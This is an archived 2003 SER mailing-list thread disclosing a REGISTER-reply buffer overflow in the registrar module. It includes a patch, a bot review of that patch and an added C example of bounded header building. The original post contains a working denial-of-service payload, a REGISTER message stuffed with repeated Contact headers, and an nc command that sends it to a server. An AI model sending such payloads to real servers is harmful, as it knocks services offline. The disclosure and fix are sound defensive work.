[Serusers] [HEADS UP] security vulnerability in ser 0.8.10

Jan Janak J.Janak at sh.cvut.cz
Sat Jan 18 12:02:12 CET 2003


Thanks, I applied the patch. The function was marked on my todo list as
"to be rewritten"; your patch saves me some time.

  regards, Jan.

On 18-01 03:41, Maxim Sobolev wrote:
> Folks,
> 
> While playing with SER I found that I can trigger a repeatable crash when
> doing REGISTER multiple times. A quick glance at the code in question
> revealed that indeed, when constructing the reply to a REGISTER message,
> SER uses a fixed-length buffer to put all non-expired contacts for that
> user and doesn't bother to check for overflow. The bug could be easily
> exploited by a complete stranger on servers that don't perform
> authentication of REGISTER requests, and by a user with valid
> credentials on servers that do authentication. Mounting the attack leads
> to denial of service.
> 
> Attached please find a fake REGISTER message, which, if sent to an open
> server, kills it (nc -u my.sip.server 5060 < register.killser),
> and a patch to fix the problem.
> 
> -Maxim

> 
> $FreeBSD$
> 
> --- modules/registrar/reply.c	2003/01/18 00:39:05	1.1
> +++ modules/registrar/reply.c	2003/01/18 01:13:13
> @@ -53,32 +53,57 @@
>   */
>  void build_contact(ucontact_t* _c)
>  {
> +	char *lastgoodend;
> +	int nummissed;
> +
>  	l = 0;
> +	lastgoodend = b;
>  	while(_c) {
>  		if (_c->expires > act_time) {
> +			if (l + 10 >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, "Contact: <", 10);
>  			l += 10;
>  			
> +			if (l + _c->c.len >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, _c->c.s, _c->c.len);
>  			l += _c->c.len;
>  			
> +			if (l + 4 >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, ">;q=", 4);
>  			l += 4;
>  			
> -			l += sprintf(b + l, "%-3.2f", _c->q);
> +			l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%-3.2f", _c->q);
> +			if (l >= MAX_CONTACT_BUFFER)
> +				break;
>  			
> +			if (l + 9 >= MAX_CONTACT_BUFFER)
> +				break;
>  			memcpy(b + l, ";expires=", 9);
>  			l += 9;
>  			
> -			l += sprintf(b + l, "%d", (int)(_c->expires - act_time));
> -			
> +			l += snprintf(b + l, MAX_CONTACT_BUFFER - l, "%d", (int)(_c->expires - act_time));
> +			if (l >= MAX_CONTACT_BUFFER)
> +				break;
> +
> +			if (l + 2 >= MAX_CONTACT_BUFFER)
> +				break;
>  			*(b + l++) = '\r';
>  			*(b + l++) = '\n';
> +			lastgoodend = b + l;
>  		}
>  
>  		_c = _c->next;
>  	}
> -	
> +	if (lastgoodend - b != l) {
> +		l = lastgoodend - b;
> +		for(nummissed = 0; _c; _c = _c->next)
> +			nummissed++;
> +		LOG(L_ERR, "build_contact(): Contact list buffer exhaused, %d contact(s) ignored\n", nummissed);
> +	}
> +
>  	DBG("build_contact(): Created Contact HF: %.*s\n", l, b);
>  }
>  
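Review bot: the `nummissed` loop after the main `while` counts every remaining list entry, including ones with `expires <= act_time` that the loop would have skipped anyway, so the "%d contact(s) ignored" figure can overstate how many bindings were actually dropped; apply the same `_c->expires > act_time` test in that counting loop. Two smaller points: the truncation is invisible on the wire (the reply simply omits bindings the registrar still holds) and is logged at `L_ERR`, a condition any client able to send a REGISTER with a long Contact list can trigger at will, so a lower log level or a single summarized message may be preferable; and the `>=` guards before each `memcpy` (e.g. `if (l + 10 >= MAX_CONTACT_BUFFER)`) leave one byte of the buffer unused, which is harmless but deserves a comment so a later reader does not "fix" it. Note also that after `l += snprintf(...)` the value of `l` can legitimately exceed `MAX_CONTACT_BUFFER` (snprintf returns the length it would have written), so the correctness of the function rests on the final `l = lastgoodend - b` reset; a comment at that line would make that dependency explicit.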

> REGISTER sip:127.0.0.1 SIP/2.0
> Via: SIP/2.0/UDP 127.0.0.2:123;branch=z9hG4bKnashds7
> Max-Forwards: 70
> To: Bob <sip:bob at biloxi.com>
> From: Bob <sip:bob at biloxi.com>;tag=456248
> Call-ID: 843817637684230 at 998sdasdh09
> CSeq: 1826 REGISTER
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Contact: <sip:bob at 192.0.2.4>
> Expires: 7200
> Content-Length: 0
> User-Agent: Cisco ATA  v2.15 ata186 (020918a)
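As an added illustration of the class of bug discussed in the message above (this is example code written for this page, not SER's code and not the posted patch), the following stand-alone C program builds a Contact header field from a linked list of bindings into a fixed-size buffer without ever writing past it. It generalizes the posted fix slightly: instead of guarding each `memcpy` separately, it formats one whole contact into a scratch line and appends it atomically, so the output is never cut in the middle of a contact, and it counts as "dropped" only the unexpired bindings that did not fit. The `contact_t` struct, `build_contact_hf`, `append_n` and `demo` names, the buffer size and the sample bindings are all constructed for this example.

```c
/* Added example (not SER's code): bounded Contact header construction.
 * Struct and function names here are hypothetical, modelled on the shape
 * of the code discussed in the thread rather than taken from SER. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <stddef.h>

#define MAX_CONTACT_BUFFER 1024   /* assumed output buffer size for this example */

typedef struct contact {
    const char *uri;              /* e.g. "sip:bob@192.0.2.4" */
    double q;                     /* preference value */
    long expires;                 /* absolute expiry time, seconds */
    struct contact *next;
} contact_t;

/* Append n bytes of src at buf+*len only if they fit with room for a NUL.
 * On overflow nothing is written and false is returned. */
static bool append_n(char *buf, size_t cap, size_t *len, const char *src, size_t n)
{
    if (n >= cap - *len)          /* keep one byte for the terminator */
        return false;
    memcpy(buf + *len, src, n);
    *len += n;
    buf[*len] = '\0';
    return true;
}

/* Build "Contact: <uri>;q=..;expires=..\r\n" lines for every unexpired
 * binding. Stops at the first binding that does not fit, so the buffer
 * always ends on a complete contact. Returns the number of contacts
 * written; *dropped receives the number of unexpired bindings omitted. */
int build_contact_hf(char *buf, size_t cap, const contact_t *c, long now, int *dropped)
{
    size_t len = 0;
    int written = 0;
    *dropped = 0;
    if (cap == 0)
        return 0;
    buf[0] = '\0';
    for (; c; c = c->next) {
        if (c->expires <= now)    /* expired bindings are never emitted */
            continue;
        char line[256];           /* scratch space for one contact */
        int n = snprintf(line, sizeof line, "Contact: <%s>;q=%-3.2f;expires=%ld\r\n",
                         c->uri, c->q, c->expires - now);
        if (n < 0 || (size_t)n >= sizeof line ||
            !append_n(buf, cap, &len, line, (size_t)n))
            break;                /* does not fit: stop at the last complete contact */
        written++;
    }
    /* Count only the unexpired bindings that were not emitted. */
    for (; c; c = c->next)
        if (c->expires > now)
            (*dropped)++;
    return written;
}

/* Constructed sample list for a stand-alone run: four bindings, one of
 * which has already expired and must be neither emitted nor counted. */
int demo(size_t cap, int *dropped, size_t *outlen)
{
    static char buf[MAX_CONTACT_BUFFER];
    contact_t c4 = { "sip:bob@192.0.2.4", 0.5, 1000 + 7200, NULL };
    contact_t c3 = { "sip:bob@192.0.2.4", 1.0, 1000 + 7200, &c4 };
    contact_t c2 = { "sip:bob@192.0.2.4", 1.0, 1000 - 1,    &c3 };  /* expired */
    contact_t c1 = { "sip:bob@192.0.2.4", 1.0, 1000 + 7200, &c2 };
    if (cap > sizeof buf)
        cap = sizeof buf;
    int written = build_contact_hf(buf, cap, &c1, 1000, dropped);
    *outlen = strlen(buf);
    return written;
}

int main(void)
{
    int dropped;
    size_t outlen;
    /* With a 120-byte cap only two of the three live bindings (50 bytes each) fit. */
    int written = demo(120, &dropped, &outlen);
    printf("cap=120: wrote %d contact(s), dropped %d, %zu bytes\n", written, dropped, outlen);
    written = demo(MAX_CONTACT_BUFFER, &dropped, &outlen);
    printf("cap=%d: wrote %d contact(s), dropped %d, %zu bytes\n",
           MAX_CONTACT_BUFFER, written, dropped, outlen);
    return 0;
}
```

Each formatted line for these sample bindings is exactly 50 bytes, so a 120-byte buffer holds two complete contacts and reports one dropped; a 51-byte buffer holds exactly one (the reserved terminator byte is what makes 50 fit and 51 not), and a 49-byte buffer holds none. The expired binding is skipped in every case and never inflates the dropped count, which is the counting subtlety worth checking in any fix of this shape.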
